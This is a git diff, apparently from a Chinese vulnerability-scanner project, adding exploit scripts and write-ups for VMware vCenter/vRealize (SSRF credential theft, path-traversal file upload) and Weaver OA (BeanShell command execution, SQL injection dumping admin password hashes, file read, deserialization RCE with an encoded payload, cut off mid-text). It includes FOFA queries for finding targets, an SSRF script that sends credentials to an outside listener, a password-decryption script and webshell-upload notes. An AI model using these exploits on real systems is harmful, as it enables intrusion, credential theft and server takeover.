content.about.instanceUuid + content.about.osType + content.about.build + content.about.version + + + + + + + + vir:VCenter + + + + ServiceInstance + + + + + + + + + + + + + vir:VCenter + + + + """ %(file_path, poc_content_part_unicode) + return content + +def Agent(ver_url): + headers = {"User-Agent": ua, + "X-Deployment-Secret": "test" +} + + json_data = { "manifestSpec":{}, + "objectType": "a2", + "collectionTriggerDataNeeded": True, + "deploymentDataNeeded":True, + "resultNeeded": True, + "signalCollectionCompleted":True, + "localManifestPath": "a7", + "localPayloadPath": "a8", + "localObfuscationMapPath": "a9" } + requests.post(ver_url, headers=headers, json=json_data, verify=False) + + +def poc(target): + result = {} + filename = "test5.jsp" + first_id = id_generate() + seconde_id = id_generate() + end_chr = target[-1] + if end_chr == "/": + url = target + "analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (first_id,seconde_id) + poc_url = target + "idm/..;/%s" % (filename) + ver_url = target + "analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (first_id,seconde_id) + else: + url = target + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (first_id,seconde_id) + poc_url = target + "/idm/..;/%s" % (filename) + ver_url = target + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (first_id,seconde_id) + Agent(ver_url) + content = poc_content(filename) + headers = {"User-Agent": ua, + "X-Deployment-Secret": "test" + } + json_data = {"contextData": "a3", "manifestContent": content, "objectId": "a2"} + requests.post(url, headers=headers, json=json_data, verify=False, timeout=5) + poc_res = requests.get(url=poc_url, headers=headers, verify=False) + if "this is a friendly test, Please check and repair upload vulnerabilities." in poc_res.text: + result['poc'] = NAME + result['poc_url'] = poc_url + result['message'] = "存在VMware vCenter Analytics 任意文件上传漏洞" + return result + +if __name__ == '__main__': + # poc调用 + poc("https://127.0.0.1") \ No newline at end of file diff --git a/Moudle/VRealize/CVE_2021_21975.md b/Moudle/VRealize/CVE_2021_21975.md new file mode 100644 index 0000000..2d8033c --- /dev/null +++ b/Moudle/VRealize/CVE_2021_21975.md @@ -0,0 +1,211 @@ +# 漏洞简述 + +vRealize Operations Manager API包含服务器端请求伪造。可以通过网络访问vRealize Operations Manager API(路由)的恶意攻击者可以执行服务器端请求伪造攻击(SSRF),并且通过服务器端向监听服务器发送的的request header头,可能会获取认证凭证。 + +# 影响范围 + +vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0 + +cloud_foundation: 4.x 3.x + +vRealize_suite_lifecycle_manager: 8.x + +其中vRealize_operations_manager的8.3及以后版本虽存在SSRF漏洞,但已不能获取认证凭证。 + +# 漏洞复现 + +漏洞复现过程: + +构造POST请求包,header头必须包含 Content-Type: application/json ,data格式为字典格式的ip:port/web路径,可以填写多个ip,用逗号分开。 + +```java +POST /casa/nodes/thumbprints HTTP/1.1 +Host: 127.0.0.1 +Content-Type: application/json +Content-Length: 24 + +[ +"127.0.0.2:6666"] +``` + +监听请求有两种途径,一是通过自己的vps监听,二是利用burpsuit的Collaborator模块监听 + +第一种途径:通过vps + +在vps监听一个ssl加密协议的端口(一定要ssl加密的端口,否则收到的信息会是乱码,下面坑点处有提到) + +```java +#在vps生成加密证书 +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem + +#监听ssl加密端口,这里为6666 +ncat -lvk 6666 --ssl --ssl-cert cert.pem --ssl-key key.pem +``` + +监听端口之后,发送伪造的请求包,即可看到认证凭证,base64解密后为账号密码 + +![](images/1.png) + +第二种途径:通过burpsuit的Collaborator模块(以下用的是burp2.0版本的,1.7版本可能需要单独安装这个模块) + +Collaborator配置,其实日常使用默认配置就可以了,第三个选项是可以用自己的vps + +![](images/2.png) + +打开Collaborator客户端,点击burpsuit左上角的Burp,选择Burp Collaborator client; + +![](images/3.png) + +伪造的请求包发送之后,就可看到认证凭证了,base64解密就是账号和密码了 + +![](images/4.png) + + + +# 复现坑点 + +使用第二种途径burpsuit Collaborator模块复现时倒是没什么问题,但用第一种途径vps监听端口复现时踩了坑。 + +期间看了漏洞代码的分析、也去找了Collaborator模块能获取到认证凭证的原因,是不是有什么特殊的payload,同时还走了大弯路,想着既然是ssrf漏洞,是不是读取了服务器上的配置文件,然后开始在靶机上各种搜索,通过文件夹名及文件内容过滤,找到了认证凭证存放的配置文件,因为不知道密码加密规则,又在网上找加密方式,未果后,最终还是回到靶机找到了相关的私钥及加密的py脚本,最终解密出来了密码。 + +此时回想起来,感觉到确实走了大弯路,想想还是回到一篇相对较全的复现文章,仔细看复现的那张截图,有哪些特殊的地方,发现监听端口时,使用了ssl加密。随后从网上找到生成加密证书的方法,但本地靶场却还是没复现成功,后边想着是不是环境的问题,就找了网上的环境,一个个测试,最终找到一个确实能获取凭证的,测试后确定成功了。分析可能是本地靶机环境的加密证书问题,不过,虽然网上的这个站获取到了凭证,但账号却不能登录,应该是账号做了限制了。。到此,这次的坑就踩完了。囧 + +相关踩坑的截图: + +1.普通的端口监听,收到的都是乱码 + +![](images/5.png) + +2.本地靶机使用加密端口监听,收到请求时还是报错 + +![](images/6.png) + +3.有个站点手工获取到凭证了,解密出来还是无法登录。。。囧,这个可能是以后真用到的时候可能会面对的**真坑** + +![](images/7.png) + +4.靶机中找凭证存放配置文件、私钥存放配置文件、加解密文件 + +根据Collaborator已经获取到的信息中的账号,找到了认证存放配置文件,但未能解密成功; + +```java +find / -name *maintenance* +``` + +![](images/8.png) + +通过相关关键词,找加密的私钥,一顿尝试,找到了,然而通过AES解密,并没有解出来; + +```java +find /usr/lib/vmware-vcops/ -name *key* +``` + +![](images/9.png) + +然后就再找加密、解密的脚本,也是一顿搜索,找到了生成私钥的脚本和加解密的脚本; + +```java +grep -n -r cluster_master_key /usr/lib/ +``` + +![](images/10.png) + +也顺手根据加解密文件名,通过内容查找找到了调用加解密脚本的py脚本; + +```java +grep -n -r vcops_crypt /usr/lib/ +``` + +![](images/11.png) + +分析加解密脚本,发现是用的base64解密及AES解密将上面提到的密码的密文解密出来的。单独将解密部分的方法拿出来测试,确实解出来了密码,但这里已经是走偏的越来越远; + +```java +import os +import sys +from base64 import b64encode, b64decode + +try: + from Crypto.Cipher import AES +except ImportError: + print(__name__ + ': Could not import Crypto.Cipher.AES, probably a test environment') + +#解密方法 +def decrypt_impl_v2(keyFilePath,text: str): + parts = text.split(':') + if len(parts) != 3: + print('ERROR: Invalid message format, unable to decrypt.') + return None + + crypt_settings = None + with open(keyFilePath, 'r') as keyFile: + for line in keyFile: + cs = get_crypt_settings(line) + if cs is not None and cs['version'].lower() == parts[0].lower(): + crypt_settings = cs + break + if crypt_settings is None: + # message is encrypted with unknown key + print('ERROR: Message is encrypted with unknown key.') + return None +#具体的解密语句 + iv = b64decode(parts[1]) + dcipher = AES.new(crypt_settings['key'], AES.MODE_CBC, iv) + ct = b64decode(parts[2]) + return str(unpad(dcipher.decrypt(ct)), 'UTF-8') + +#对私钥内容进行分段提取 +def get_crypt_settings(line: str): + line = line.strip() + if not line: + return None + ret = dict() + parts = line.split(' ') + if len(parts) == 1: + # old key format + key = parts[0].strip() + ret['version'] = 'V1' + ret['key'] = bytes(key, 'UTF-8') + else: + ret['version'] = parts[0] + for s in parts[1:]: + kvPair = s.split('=', 1) + kvPair[0] = kvPair[0].lower() + if kvPair[0] == 'key': + ret['key'] = b64decode(bytes(kvPair[1], 'UTF-8')) + + return ret + +def unpad(data: bytes): + return data[0:-(data[-1])] + +#单独把私钥文件和密码密文当做参数传进去 +result = decrypt_impl_v2("cluster_master_key.txt","V2:qSLqYStKf1RpftOQ9l4MKA==:m3zt8+IacO2lDN86HrZRdJGTZi07151GmiWDMWOUeHc=") +print(result) +``` + +# 漏洞修复 + +如果无法安装修补程序,或者没有适用于您的 vRealize Operations 版本的修补程序,可以采取以下步骤来解决该问题。应用此权宜措施不会对 vRealize Operations 产生影响。 + +要在 vRealize Operations 中临时解决此问题,请从 casa-security-context.xml + +1. 通过 SSH 或控制台以 root 身份登录主节点,在控制台中按 ALT+F1 进行登录 +2. 打开 /usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml + +1. 查找并删除该行: +2. 保存并关闭文件 + +1. 使用以下命令重新启动 CaSA 服务: service vmware-casa restart +2. 在 vRealize Operations 群集中的所有其他节点上重复步骤 1-5 + + + +# poc + +poc里单独做了一个exp部分,单独使用脚本,加第二个参数即可,第二个参数为vps_ip:port格式或者Collaborator中的域名。需要先vps监听好端口或者使用Collaborator。验证需要到相应的地方去查看header头中是否有Authorization字段。不建议批量exp验证,因网站服务端发送的没有网站的信息,多了容易混乱。 + +使用域名相对方便一些 ,不过经过测试,都有坑,若需要测试多个站,两者都不能不中断的不间断测试,个人分析应该是因为上一个站测试时,https连接还未完全关闭,导致下一个站发送请求时出现问题,vps的解决方法是,ctrl+c中断之后,再重新监听端口,Collaborator的解决方法是Copy to clipboard重新获取一个域名,Collaborator还有个坑是,域名太长,可能会有一些站不能发送https请求过来。 + +纯poc部分的检测方法是通过post请求漏洞URL,对比其状态码判断的,对于要获取认证凭证来说,肯定是存在误报的,有的站虽然有SSRF漏洞,但却不一定能获取到认证凭证。 + diff --git a/Moudle/VRealize/CVE_2021_21975.py b/Moudle/VRealize/CVE_2021_21975.py new file mode 100644 index 0000000..cf2508d --- /dev/null +++ b/Moudle/VRealize/CVE_2021_21975.py @@ -0,0 +1,54 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='CVE-2021-21975' +AUTHOR="境心" +REMARK='VMware vRealize&Cloud Foundation SSRF漏洞' +FOFA_RULE='app="vmware-vRealize-Operations-Manager"' +###################################################### + +def ret_data(exp=None): + if exp == None: + data = '["127.0.0.1/admin/login.action"]' + timeout = 5 + elif exp != None: + data = '["%s"]' % exp + timeout = 15 + return data,timeout + +def _request(target,exp=None): + url = target + "/casa/nodes/thumbprints" + headers = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36", + "Content-Type": "application/json;charset=UTF-8" + } + data,timeout = ret_data(exp) + res = requests.post(url, headers=headers, data=data, verify=False, timeout=timeout) + return res,url + +def poc(target,exp=None): + result = {} + res,url = _request(target,exp) + if exp == None: + if res.status_code == 200: + result['poc'] = NAME + result['poc_url'] = url + result['message'] = '可能存在SSRF漏洞,请手工验证' + return result + elif exp != None: + if res.status_code == 200: + print('请到vps查看header中是否存在Authorization字段') + + +if __name__ == '__main__': + # poc调用 + poc("https://127.0.0.1:443/","4sxpi8otjyj4w0shsthm0ibbn2tvhk.burpcollaborator.net") \ No newline at end of file diff --git a/Moudle/VRealize/CVE_2021_21983.md b/Moudle/VRealize/CVE_2021_21983.md new file mode 100644 index 0000000..068be81 --- /dev/null +++ b/Moudle/VRealize/CVE_2021_21983.md @@ -0,0 +1,88 @@ +# 漏洞简述 + +vRealize 路由中存在一上传功能,由于未对上传做任何安全过滤,导致可在有认证凭证的情况下,实现任意文件上传,获取服务器控制权限。 + +亲测,上一波漏洞CVE-2021-21975中获取到认证信息,但无法通过web管理端登录的问题,此漏洞可不受其限制,只要认证信息准确,依然能够实现任意文件上传,获取控制权限。 + +# 影响范围 + +vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0 + +cloud_foundation: 4.x 3.x + +vRealize_suite_lifecycle_manager: 8.x + +限于环境问题,最高测试到vRealize_operations_manager的8.3.0.17501340版本,都是存在该漏洞的,虽然8.3版本开始,通过SSRF漏洞已不能获取到认证信息,但若在能知晓认证信息的情况下,还是能获取到控制权限的。 + +# 漏洞分析 + +casa/classes/com/vmware/vcops/casa/appconfig/CertificateController.class位置 存在一路由,这里使用POST方法接收了两个参数name和file + +![](images/21.png) + +跟进 CertificateService#handleCertificateFile,这里创建了一个File对象,直接使用transferTo函数上传文件,两个参数都可控,没有任何过滤,就出现了任意文件上传漏洞。 + +![](images/22.png) + + + + + +# 漏洞复现 + +POST包: + +```java +POST /casa/private/config/slice/ha/certificate HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Dnt: 1 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjI6L21UN3dGSFh0VFM3Q2ZDMklQWnc2Mmcv +Te: trailers +Connection: close +Content-Length: 492 + +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="name" + +../../../../../usr/lib/vmware-casa/casa-webapp/webapps/casa/test1.jsp +------WebKitFormBoundarypyfBh1YB4pV8McGB +Content-Disposition: form-data; name="file"; filename="" +Content-Type: image/jpeg + +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% out.print("this is a friendly test, Please check and repair upload vulnerabilities."); +%> +------WebKitFormBoundarypyfBh1YB4pV8McGB-- +``` + +网上均是文章一大抄,没有看到一篇放POST包的,文章内容截图一模一样。这里根据分析的代码部分,URL为第一张图中的路由,访问该URL,登录抓包,看到其中熟悉的header头,Authorization字段,在CVE-2021-21975中获取的就是这个东东。亲测默认的admin账号也可以实现效果,格式为admin:password的base64加密。 + +POST包为常规的文件上传的Content-Type格式,主要有两个核心上传参数name和file。name的value为文件名,file的value为文件内容。 + +尝试默认上传位置为/storage/vcops/user/conf/ssl/,上传之后无法通过web访问到;就想到在文件名的位置通过../构造切换web可访问的位置。 + +路径切换的时候,文件并不能保存到操作系统根目录下,但可借助切换到根目录时,无缝衔接切换到根目录下的其他文件夹下,就有了上面POST包中的name参数的value。这样文件上传后的URL为:https://ip:port/casa/test1.jsp,自行更改上传的文件名。 + + + +如果上传shell的话,记得也要加上Authorization哈,否则返回401;比如冰蝎: +![](images/23.png) + + + +# poc/exp + +此poc需要传入认证信息,格式为user:password格式的base64编码,详情见CVE-2021-21975漏洞获取的认证信息。 + +更改content中的poc部分为shell,即可实现exp。exp的时候,记得先更改一下脚本中的判断部分,详见脚本中的注释提示。 + diff --git a/Moudle/VRealize/CVE_2021_21983.py b/Moudle/VRealize/CVE_2021_21983.py new file mode 100644 index 0000000..ca434c2 --- /dev/null +++ b/Moudle/VRealize/CVE_2021_21983.py @@ -0,0 +1,55 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import io +from Config.config_requests import ua +import requests.packages.urllib3 +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='CVE-2021-21983' +AUTHOR="境心" +REMARK='VMware vRealize 认证后任意文件上传漏洞' +FOFA_RULE='app="vmware-vRealize-Operations-Manager"' +###################################################### + +def poc_content(filename1): + content = """------WebKitFormBoundarypyfBh1YB4pV8McGB\r\nContent-Disposition: form-data; name="name"\r\n\r\n../../../../../usr/lib/vmware-casa/casa-webapp/webapps/casa/{0}\r\n------WebKitFormBoundarypyfBh1YB4pV8McGB\r\nContent-Disposition: form-data; name="file"; filename=""\r\nContent-Type: image/jpeg\r\n\r\n<%@ page contentType="text/html;charset=UTF-8" language="java" %>\r\n<% out.print("this is a friendly test, Please check and repair upload vulnerabilities.");\r\n%>\r\n------WebKitFormBoundarypyfBh1YB4pV8McGB--""".format(filename1) + mem_string = io.StringIO() + mem_string.write(content) + mem_string.seek(0) + return mem_string + +def poc(target,exp=None): + if exp: + result = {} + url = target + "/casa/private/config/slice/ha/certificate" + headers = { + "User-Agent" : ua, + "Content-Type" : "multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB", + "Authorization" : "Basic %s" % exp + } + filename1 = "abctestabc.jsp" + mem_string = poc_content(filename1) + res = requests.post(url, headers=headers, data=mem_string.read(), verify=False, timeout=5) + if res.status_code == 200: + poc_url = target + "/casa/%s" %filename1 + poc_res = requests.get(poc_url, headers=headers, verify=False, timeout=5) + if "this is a friendly test, Please check and repair upload vulnerabilities." in poc_res.text: + # if poc_res.status_code == 200: # exp的时候作为判断使用,注释掉上面一句判断,并取消这个注释 + result['poc'] = NAME + result['poc_url'] = poc_url + result['message'] = "存在%s" % REMARK + # print(result) + return result + else: + return "认证信息为空,请先获取并传入认证信息" + +if __name__ == '__main__': + # poc调用 + poc("https://127.0.0.1/","YWRtaW46QWRtaW5AMTIz") \ No newline at end of file diff --git a/Moudle/VRealize/images/1.png b/Moudle/VRealize/images/1.png new file mode 100644 index 0000000..976767d Binary files /dev/null and b/Moudle/VRealize/images/1.png differ diff --git a/Moudle/VRealize/images/10.png b/Moudle/VRealize/images/10.png new file mode 100644 index 0000000..975c8b4 Binary files /dev/null and b/Moudle/VRealize/images/10.png differ diff --git a/Moudle/VRealize/images/11.png b/Moudle/VRealize/images/11.png new file mode 100644 index 0000000..17c7e0f Binary files /dev/null and b/Moudle/VRealize/images/11.png differ diff --git a/Moudle/VRealize/images/2.png b/Moudle/VRealize/images/2.png new file mode 100644 index 0000000..887b057 Binary files /dev/null and b/Moudle/VRealize/images/2.png differ diff --git a/Moudle/VRealize/images/21.png b/Moudle/VRealize/images/21.png new file mode 100644 index 0000000..7217a38 Binary files /dev/null and b/Moudle/VRealize/images/21.png differ diff --git a/Moudle/VRealize/images/22.png b/Moudle/VRealize/images/22.png new file mode 100644 index 0000000..2dbb821 Binary files /dev/null and b/Moudle/VRealize/images/22.png differ diff --git a/Moudle/VRealize/images/23.png b/Moudle/VRealize/images/23.png new file mode 100644 index 0000000..5e981e4 Binary files /dev/null and b/Moudle/VRealize/images/23.png differ diff --git a/Moudle/VRealize/images/3.png b/Moudle/VRealize/images/3.png new file mode 100644 index 0000000..b7b1d0e Binary files /dev/null and b/Moudle/VRealize/images/3.png differ diff --git a/Moudle/VRealize/images/4.png b/Moudle/VRealize/images/4.png new file mode 100644 index 0000000..02faef1 Binary files /dev/null and b/Moudle/VRealize/images/4.png differ diff --git a/Moudle/VRealize/images/5.png b/Moudle/VRealize/images/5.png new file mode 100644 index 0000000..b6c02fe Binary files /dev/null and b/Moudle/VRealize/images/5.png differ diff --git a/Moudle/VRealize/images/6.png b/Moudle/VRealize/images/6.png new file mode 100644 index 0000000..8d91d15 Binary files /dev/null and b/Moudle/VRealize/images/6.png differ diff --git a/Moudle/VRealize/images/7.png b/Moudle/VRealize/images/7.png new file mode 100644 index 0000000..791459e Binary files /dev/null and b/Moudle/VRealize/images/7.png differ diff --git a/Moudle/VRealize/images/8.png b/Moudle/VRealize/images/8.png new file mode 100644 index 0000000..445a1bd Binary files /dev/null and b/Moudle/VRealize/images/8.png differ diff --git a/Moudle/VRealize/images/9.png b/Moudle/VRealize/images/9.png new file mode 100644 index 0000000..0dc9036 Binary files /dev/null and b/Moudle/VRealize/images/9.png differ diff --git a/Moudle/Weaver/CNVD_2019_32204.py b/Moudle/Weaver/CNVD_2019_32204.py new file mode 100644 index 0000000..4263a53 --- /dev/null +++ b/Moudle/Weaver/CNVD_2019_32204.py @@ -0,0 +1,48 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +######################################################################################################################## +# 脚本信息 +NAME='CNVD_2019_32204' +AUTHOR="Faith" +REMARK='泛微OA Bsh 远程代码执行漏洞' +FOFA_RULE='app="泛微-协同办公OA"' +######################################################################################################################## + +def poc(target): + result={} + payload1 = "/bsh.servlet.BshServlet" + payload2 = "/weaver/bsh.servlet.BshServlet" + payload3 = "/weaveroa/bsh.servlet.BshServlet" + payload4 = "/oa/bsh.servlet.BshServlet" + + data1 = '''bsh.script=exec("whoami");&bsh.servlet.output=raw''' + data2 = '''bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw''' + data3 = '''bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami''' + + for payload in (payload1,payload2,payload3,payload4): + url = target + payload + for data in (data1,data2,data3): + try: + r = requests.post(url,data=data,headers=headers,verify=False,timeout=3) + if r.status_code == 200: + if ";" not in r.content: + if "login.jsp" not in r.content: + if "Error" not in r.content: + result["target"] = target + result["poc"] = NAME + result["url"] = url + return result + else: + pass + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weaver/Weaver_OA_V8_sqlinjection.py b/Moudle/Weaver/Weaver_OA_V8_sqlinjection.py new file mode 100644 index 0000000..d293919 --- /dev/null +++ b/Moudle/Weaver/Weaver_OA_V8_sqlinjection.py @@ -0,0 +1,34 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +######################################################################################################################## +# 脚本信息 +NAME='Weaver_OA_V8_sqlinjection' +AUTHOR="RabbitMask" +REMARK='泛微OA V8 SQL注入漏洞' +FOFA_RULE='app="泛微-协同办公OA"' +######################################################################################################################## + + +def poc(target): + result={} + try: + url = target + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager" + r = requests.get(url=url,headers=headers,verify=False,timeout=5) + if r.status_code == 200 and 'html' not in r.text: + result["target"] = target + result["poc"] = NAME + result["url"] = url + result["用户"] = 'sysadmin' + result["密码MD5"] = r.text.strip() + return result + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weaver/Weaver_e_Bridge_file_read.py b/Moudle/Weaver/Weaver_e_Bridge_file_read.py new file mode 100644 index 0000000..757389b --- /dev/null +++ b/Moudle/Weaver/Weaver_e_Bridge_file_read.py @@ -0,0 +1,47 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + + +######################################################################################################################## +# 脚本信息 +NAME='Weaver_e_Bridge_file_read' +AUTHOR="Faith" +REMARK='泛微云桥 e-Bridge 任意文件读取' +FOFA_RULE='title="泛微云桥e-Bridge"' +######################################################################################################################## + +def poc(target): + result={} + url = target + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt" + url1 = target + "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt" + + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=url,headers=headers,verify=False,timeout=5) + r1 = requests.get(url1=url1,headers=headers,verify=False,timeout=5) + if r.status_code == 200 and "无法验证您的身份" not in r.text: + result["target"] = target + result["poc"] = NAME + result["url"] = url + result["system"] = "windows" + return result + else: + pass + if r1.status_code == 200 and "无法验证您的身份" not in r1.text: + result["target"] = target + result["poc"] = NAME + result["url"] = url1 + result["system"] = "linux" + return result + else: + pass + + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weaver/Weaver_e_Cology_RCE.py b/Moudle/Weaver/Weaver_e_Cology_RCE.py new file mode 100644 index 0000000..1ef81f6 --- /dev/null +++ b/Moudle/Weaver/Weaver_e_Cology_RCE.py @@ -0,0 +1,54 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import sys +from requests.packages.urllib3.exceptions import InsecureRequestWarning + + +######################################################################################################################## +# 脚本信息 +NAME='Weaver_e_Cology_RCE' +AUTHOR="Faith" +REMARK='泛微E-Cology WorkflowServiceXml RCE' +FOFA_RULE='app="泛微-协同办公OA"' +######################################################################################################################## + +def poc(target): + result={} + url = target + "/services%20/WorkflowServiceXml" + cmd = "net user" + headers = { + 'User-Agent': 'Apache-HttpClient/4.1.1 (java 1.5)', + 'SOAPAction': '""', + 'Cmd': cmd, + "Content-Type": "text/xml;charset=UTF-8" + } + data = ''' + + + + + + + + <java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class='javafx.collections.ObservableList$1'/> </default> <int>3</int> <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data> <dataHandler> <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'> <contentType>text/plain</contentType> <is class='java.io.SequenceInputStream'> <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'> <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'> <names class='java.util.AbstractList$Itr'> <cursor>0</cursor> <lastRet>-1</lastRet> <expectedModCount>0</expectedModCount> <outer-class class='java.util.Arrays$ArrayList'> <a class='string-array'> <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85V$5bW$TW$U$fe$86$q$cc0$M$82A$84$a8$bd$d8V$N$u$89$d6$de$M$d6$8a$5c$ea$r$a05$U$x$da$ea0$ia$q$99$89$93$JP$7b$b1$ad$bd$df$ef$ad$bd$bc$f8$e2S$l$5c$ab$xj$5b$bb$da$3e$f6Gi$bf3$J$94$90$a8$ac$c5$999$fb$7c$fb$f6$ed$bdO$e6$df$5b$bf$fd$J$e01$fc$ac$a3$J$87t$a41$o$97Q$N$87u$i$c1s$g$8e$aa$c8$e8P1$a6$e2y$j$e38$s$91$_H$c9q$N$T$f2yB$c7I$bc$u$97$974$9cRqZ$83$a9$p$8aI$N$96$8a$v$N$v$VB$c7$ZL$cbeF$87$8d$b3$3a$ba0$ab$n$x$9f9$b98rq5$e4U$9c$d3$f1$Q$3c$V$F$F$8d$bbm$c7$f6$f7$u$I$c5$bb$c7$V$84$H$dc$v$a1$a05m$3bb$b4$98$9b$U$de$989$99$a5$q$9av$z3$3bnz$b6$dcW$84a$7f$c6$a6$8d$e6$f4$be$81$a1trh$ce$ce$f6$v$d0v$5b$d9$8a$cd$a8o$e5$L$ae5$x$7c$da$9b$j$c8$9a$e7$cf$xX$9d$3ek$ce$99$c9$ac$e9L$t$v$w$U$a8$T$9d$W$fe$40$d1$f3$84$e3$l$V$e7$8a$a2$e0$8f$uX$b7$M$e8$893Ya$f9$c9$R$e1$cf$b8S$d4XeU$c1e$80$ff$a3$PO$9e$r$98$u$e5$8c$82X$j3$c3$b6$c8J$x$9a$t$Ky$d7$v0$X$9d$n$i$f3l_xt$ad$cc$xh$x$eb$d9n$b2$y$ee$xc$f6$Ls$w$c0$84$ac$dcT$b5$db$8c$ef$d9$ce$b4tKR$da$cb$HE$df$ce$s3$96$e98$81$85$c8$9c$e9$ed$d8$a1$a0c$99$da$d0$82$r$f2$be$ed$3a$3co$c9$f8$a65$3bb$e6$D$86$d9$Y$w$7c$b6$85$8a$o$ab$ceR$b3$ce$y$l$p$c9$b8E$cf$S$c3$b6$yC$93d$3e$n$N$g$d8$84$cd$w$e6$M$ccc$c1$c0$cb$m$df$5b$y7$97$b0$cc$a25$e3$s$i$e1$cf$bb$del$ok$X$7c$e1$q$c6$ac$7cf$a9$3c$w$5e1$f0$w$5ec$85j$aa$c1$8eXQ4$D$af$e3$CIZI$3a$e35$f0$G$de4$f0$W$$$gx$h$X$a9$7bj$91$e6a$d3$o$7b$G$de$c1$bbL$c9$c0$7bx$df$c0$H$f8$909$y$d1$cf$daV$T$cf2$8d$X$b3c$MC7$f0$R$3e$$$83$cbu$a8$8a$a0$cc$3f$e3$afa$5e$c5$t$G$3e$c5g$G$3e$c7$X$w$be4$f0$V$be$96d$7d$a3$a0$e1d$bf$81o$f1$9d$81$efq$c9$c0$P$f8Q$BX$bf$3a$F2$f0$T6$d3$fdR$bb$x$e8$baS$8f$w$e8$bcC$dfU$c5$3c6$e31$R$W$be$d2$cf$8b$fb5$f1$ee$f4J$U$fb$a3C$96$c6u$7c$b1$e0$HeH$bbe$WbU$f0eGR$a7$ee$B$d3$c8$f2$r$90$u$d8$U$af$ed$e3$g$8b$7de$e6$X$f3$db$5bG$e7D$8dN$f7$dd$a6$b8$d1v$e6$dcY$b6$f0$aex$ed$f8$9e$a8$Vu$d7$hrMrRN$a3$bd$96$G9T$Ed$8ay$e1YeT$h$f7$83$82$hOLU$w$d2$7b$8f$fcW$5e$i$z$F$e1$f7$5b$96$u$U$ec$f2M$Y$9f$90$d7g$88$96$Vl$ae$93L$dd$c8$p$f3$b2$c1Y$a1z$de$c7$X$h9$90$k$z$3a$be$9d$ab$dcSK$9b$8e$aa$7c$xb$g$O$8b$Faq$f4$ef$91$d5$R$cf$95$v$f4Uy$aa$I9$86$f4t$c0$c9$X$7dj$K3$c7$86$5e$f4$c6$d1$5cv$40$f5$aex$dd$D$99$83Q$y$88A$91$b5s$e5Q$beKH$x$aeJu$c6$y$8c$b2$cf$83$9f$a6$J$e6$e4$E$9b$ea$c1X$bar$5b$f3$7c$f1$83$dbs$cc3$z$81$8dx$84$3f$a3$f2$af$81$d3$cck$91$eb$